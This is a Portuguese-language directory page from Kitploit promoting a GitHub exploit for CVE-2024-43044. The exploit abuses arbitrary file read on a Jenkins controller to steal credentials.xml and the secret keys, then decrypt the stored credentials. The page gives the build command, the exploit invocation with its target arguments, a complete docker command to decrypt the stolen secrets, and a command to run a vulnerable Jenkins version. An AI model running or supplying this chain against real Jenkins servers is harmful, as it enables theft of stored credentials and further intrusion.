Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-43044-jenkins-creds — Exploit para CVE-2024-43044 permitindo leitura arbitrária de arquivos do controlador Jenkins para extrair e descriptografar credentials.xml usando chaves secretas. | Kitploit
Ferramentas/GitHubGitHub/dacc4/cve-2024-43044-jenkins-creds
Ferramentas de Criptografia/DescriptografiaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubdacc4/cve-2024-43044-jenkins-creds

CVE-2024-43044-jenkins-creds

Exploit para CVE-2024-43044 permitindo leitura arbitrária de arquivos do controlador Jenkins para extrair e descriptografar credentials.xml usando chaves secretas.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
18há 1 anoAinda não revisado

Introdução

Este é um exploit para CVE-2024-43044, uma leitura arbitrária de arquivos que permite a um agente buscar arquivos do controlador.

O exploit usará a vulnerabilidade para ler o arquivo credentials.xml e obter as chaves secretas para descriptografá-lo.

Código inicial: https://github.com/convisolabs/CVE-2024-43044-jenkins Análise original: https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

Compilando o exploit

mvn package

Executando o exploit

java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>

Descriptografar credentials.xml

docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
  docker.io/hoto/jenkins-credentials-decryptor:latest \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json

Testando

Você pode testá-lo em uma versão vulnerável usando docker:

docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17

Assim que você tiver um Jenkins em execução, configure um agente.

Baixar ferramenta